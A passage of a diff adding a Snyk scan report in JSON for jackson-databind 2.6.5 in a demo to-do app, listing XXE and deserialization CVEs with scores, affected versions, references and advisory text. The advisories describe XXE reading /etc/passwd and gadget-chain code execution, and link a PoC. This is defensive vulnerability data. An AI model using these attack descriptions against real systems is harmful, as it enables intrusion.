+ "probability": "0.00464", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2020-10650" + ], + "CWE": [ + "CWE-502" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2020-11-29T12:43:11.601162Z", + "functions_new": [ + { + "version": [ + "[,2.6.7.4)", + "[2.7.0,2.9.10.4)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2020-09-29T22:30:33Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2020-11-29T15:58:07.317638Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:52:55.201119Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-1048302", + "title": "XML External Entity (XXE) Injection", + "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:L", + "credit": [ + "Bartosz Baranowski" + ], + "semver": { + "vulnerable": [ + "[2.6.0,2.6.7.4)", + "[2.9.0,2.9.10.7)", + "[2.10.0, 2.10.5.1)" + ] + }, + "exploit": "Not Defined", + "fixedIn": [ + "2.6.7.4", + "2.9.10.7", + "2.10.5.1" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.2, + "functions": [ + { + "version": [ + "[2.6.0,2.6.7.4)", + "[2.9.0,2.9.10.7)", + "[2.10.0, 2.10.5.1)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ext/DOMSerializer.java", + "className": "DOMSerializer", + "functionName": "" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/commit/612f971b78c60202e9cd75a299050c8f2d724a59", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2589", + "title": "GitHub Issue" + }, + { + "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1887664", + "title": "RedHat Bugzilla Bug" + } + ], + "cvssDetails": [ + { + "assigner": "SUSE", + "severity": "medium", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:L/A:N", + "cvssV3BaseScore": 5.8, + "modificationTime": "2024-03-11T09:49:41.313444Z" + }, + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", + "cvssV3BaseScore": 7.5, + "modificationTime": "2024-03-11T09:50:46.628614Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", + "cvssV3BaseScore": 7.5, + "modificationTime": "2024-03-11T09:51:14.249736Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:L", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.2, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T14:03:31.367594Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:L/A:N", + "assigner": "SUSE", + "severity": "medium", + "baseScore": 5.8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:49:41.313444Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", + "assigner": "NVD", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:50:46.628614Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:51:14.249736Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to XML External Entity (XXE) Injection. A flaw was found in FasterXML Jackson Databind, where it does not have entity expansion secured properly in the `DOMDeserializer` class. The highest threat from this vulnerability is data integrity.\n\n## Details\nXXE Injection is a type of attack against an application that parses XML input.\nXML is a markup language that defines a set of rules for encoding documents in a format that is both human-readable and machine-readable. By default, many XML processors allow specification of an external entity, a URI that is dereferenced and evaluated during XML processing. When an XML document is being parsed, the parser can make a request and include the content at the specified URI inside of the XML document.\n\nAttacks can include disclosing local files, which may contain sensitive data such as passwords or private user data, using file: schemes or relative paths in the system identifier.\n\nFor example, below is a sample XML document, containing an XML element- username.\n\n```\n\n\n John\n\n```\n\nAn external XML entity - `xxe`, is defined using a system identifier and present within a DOCTYPE header. These entities can access local or remote content. For example the below code contains an external XML entity that would fetch the content of `/etc/passwd` and display it to the user rendered by `username`.\n\n```\n\n\n]>\n &xxe;\n\n```\n\nOther XXE Injection attacks can access local resources that may not stop returning data, possibly impacting application availability and leading to Denial of Service.\n\n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.4, 2.9.10.7, 2.10.5.1 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/612f971b78c60202e9cd75a299050c8f2d724a59)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2589)\n- [RedHat Bugzilla Bug](https://bugzilla.redhat.com/show_bug.cgi?id=1887664)\n", + "epssDetails": { + "percentile": "0.68432", + "probability": "0.00275", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2020-25649" + ], + "CWE": [ + "CWE-611" + ], + "GHSA": [ + "GHSA-288c-cq4h-88gq" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2020-12-04T11:58:40.054903Z", + "functions_new": [ + { + "version": [ + "[2.6.0,2.6.7.4)", + "[2.9.0,2.9.10.7)", + "[2.10.0, 2.10.5.1)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ext.DOMSerializer", + "functionName": "" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2020-12-04T11:54:03Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2020-12-04T15:22:52Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:51:14.249736Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-1052449", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[,2.9.10.8)" + ] + }, + "exploit": "Not Defined", + "fixedIn": [ + "2.9.10.8" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[,2.10.0.pr1)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2986", + "title": "GitHub Issue" + } + ], + "cvssDetails": [ + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:48:38.926544Z" + }, + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:51:26.923105Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:55:42.491903Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:48:38.926544Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:51:26.923105Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. It mishandles the interaction between serialization gadgets and typing, related to `org.apache.commons.dbcp2.datasources.PerUserPoolDataSource`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating object from sequence of bytes is called deserialization. Serialization is commonly used for communication (sharing objects between multiple hosts) and persistence (store the object state in a file or a database). It is an integral part of popular protocols like _Remote Method Invocation (RMI)_, _Java Management Extension (JMX)_, _Java Messaging System (JMS)_, _Action Message Format (AMF)_, _Java Server Faces (JSF) ViewState_, etc.\n\n_Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)), is when the application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, letting the attacker to control the state or the flow of the execution.\n\nJava deserialization issues have been known for years. However, interest in the issue intensified greatly in 2015, when classes that could be abused to achieve remote code execution were found in a [popular library (Apache Commons Collection)](https://snyk.io/vuln/SNYK-JAVA-COMMONSCOLLECTIONS-30078). These classes were used in zero-days affecting IBM WebSphere, Oracle WebLogic and many other products.\n\n \nAn attacker just needs to identify a piece of software that has both a vulnerable class on its path, and performs deserialization on untrusted data. Then all they need to do is send the payload into the deserializer, getting the command executed.\n \n\n> Developers put too much trust in Java Object Serialization. Some even de-serialize objects pre-authentication. When deserializing an Object in Java you typically cast it to an expected type, and therefore Java's strict type system will ensure you only get valid object trees. Unfortunately, by the time the type checking happens, platform code has already created and executed significant logic. So, before the final type is checked a lot of code is executed from the readObject() methods of various objects, all of which is out of the developer's control. By combining the readObject() methods of various classes which are available on the classpath of the vulnerable application, an attacker can execute functions (including calling Runtime.exec() to execute local OS commands).\n\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.10.8 or higher.\n## References\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2986)\n", + "epssDetails": { + "percentile": "0.66225", + "probability": "0.00262", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2020-35490" + ], + "CWE": [ + "CWE-502" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2020-12-18T11:37:26.422837Z", + "functions_new": [ + { + "version": [ + "[,2.10.0.pr1)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2020-12-18T11:32:48Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2020-12-18T16:33:11Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:51:26.923105Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-1052450", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[,2.9.10.8)" + ] + }, + "exploit": "Not Defined", + "fixedIn": [ + "2.9.10.8" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[,2.10.0.pr1)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2986", + "title": "GitHub Issue" + } + ], + "cvssDetails": [ + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:48:38.975620Z" + }, + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:50:57.453912Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:55:38.762302Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:48:38.975620Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:50:57.453912Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. It mishandles the interaction between serialization gadgets and typing, related to `org.apache.commons.dbcp2.datasources.SharedPoolDataSource`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating object from sequence of bytes is called deserialization. Serialization is commonly used for communication (sharing objects between multiple hosts) and persistence (store the object state in a file or a database). It is an integral part of popular protocols like _Remote Method Invocation (RMI)_, _Java Management Extension (JMX)_, _Java Messaging System (JMS)_, _Action Message Format (AMF)_, _Java Server Faces (JSF) ViewState_, etc.\n\n_Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)), is when the application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, letting the attacker to control the state or the flow of the execution.\n\nJava deserialization issues have been known for years. However, interest in the issue intensified greatly in 2015, when classes that could be abused to achieve remote code execution were found in a [popular library (Apache Commons Collection)](https://snyk.io/vuln/SNYK-JAVA-COMMONSCOLLECTIONS-30078). These classes were used in zero-days affecting IBM WebSphere, Oracle WebLogic and many other products.\n\n \nAn attacker just needs to identify a piece of software that has both a vulnerable class on its path, and performs deserialization on untrusted data. Then all they need to do is send the payload into the deserializer, getting the command executed.\n \n\n> Developers put too much trust in Java Object Serialization. Some even de-serialize objects pre-authentication. When deserializing an Object in Java you typically cast it to an expected type, and therefore Java's strict type system will ensure you only get valid object trees. Unfortunately, by the time the type checking happens, platform code has already created and executed significant logic. So, before the final type is checked a lot of code is executed from the readObject() methods of various objects, all of which is out of the developer's control. By combining the readObject() methods of various classes which are available on the classpath of the vulnerable application, an attacker can execute functions (including calling Runtime.exec() to execute local OS commands).\n\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.10.8 or higher.\n## References\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2986)\n", + "epssDetails": { + "percentile": "0.66225", + "probability": "0.00262", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2020-35491" + ], + "CWE": [ + "CWE-502" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2020-12-18T11:40:53.658144Z", + "functions_new": [ + { + "version": [ + "[,2.10.0.pr1)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2020-12-18T11:40:13Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2020-12-18T16:33:11Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:50:57.453912Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-1054588", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P", + "credit": [ + "bu5yer" + ], + "semver": { + "vulnerable": [ + "[2.0.0, 2.9.10.8)" + ] + }, + "exploit": "Proof of Concept", + "fixedIn": [ + "2.9.10.8" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[2.0.0, 2.9.10.8)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2999", + "title": "GitHub Issue" + }, + { + "url": "https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062", + "title": "Medium Post" + }, + { + "url": "https://github.com/Al1ex/CVE-2020-35728", + "title": "PoC" + } + ], + "cvssDetails": [ + { + "assigner": "SUSE", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", + "cvssV3BaseScore": 7.3, + "modificationTime": "2024-03-11T09:49:38.478896Z" + }, + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:51:01.576739Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:51:23.852735Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:58:43.478254Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", + "assigner": "SUSE", + "severity": "high", + "baseScore": 7.3, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:49:38.478896Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:51:01.576739Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:51:23.852735Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. It mishandles the interaction between serialization gadgets and typing, related to `com.oracle.wls.shaded.org.apache.xalan.lib.sql.JNDIConnectionPool` (aka embedded Xalan in `org.glassfish.web/javax.servlet.jsp.jstl`).\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.10.8 or higher.\n## References\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2999)\n- [Medium Post](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n- [PoC](https://github.com/Al1ex/CVE-2020-35728)\n", + "epssDetails": { + "percentile": "0.80006", + "probability": "0.00674", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2020-35728" + ], + "CWE": [ + "CWE-502" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2020-12-27T14:34:18.527699Z", + "functions_new": [ + { + "version": [ + "[2.0.0, 2.9.10.8)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2020-12-27T14:05:38Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Proof of Concept", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2020-12-27T17:34:55Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:51:23.852735Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-1056414", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[,2.9.10.8)" + ] + }, + "exploit": "Unproven", + "fixedIn": [ + "2.9.10.8" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[,2.9.10.8)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/commit/3e8fa3beea49ea62109df9e643c9cb678dabdde1", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2997", + "title": "GitHub Issue" + }, + { + "url": "https://cowtowncoder.medium.com/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062", + "title": "Medium Article" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:51:01.748169Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:51:23.768509Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:59:37.093517Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:51:01.748169Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:51:23.768509Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. The package mishandles the interaction between serialization 